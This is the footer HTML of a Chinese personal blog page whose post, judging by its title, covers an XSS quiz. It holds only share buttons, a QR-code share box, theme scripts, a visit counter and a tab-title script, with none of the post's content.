        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《用肝刷xss-quiz》 — osword's blog&url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&via=http://zhzhdoai.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: false };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
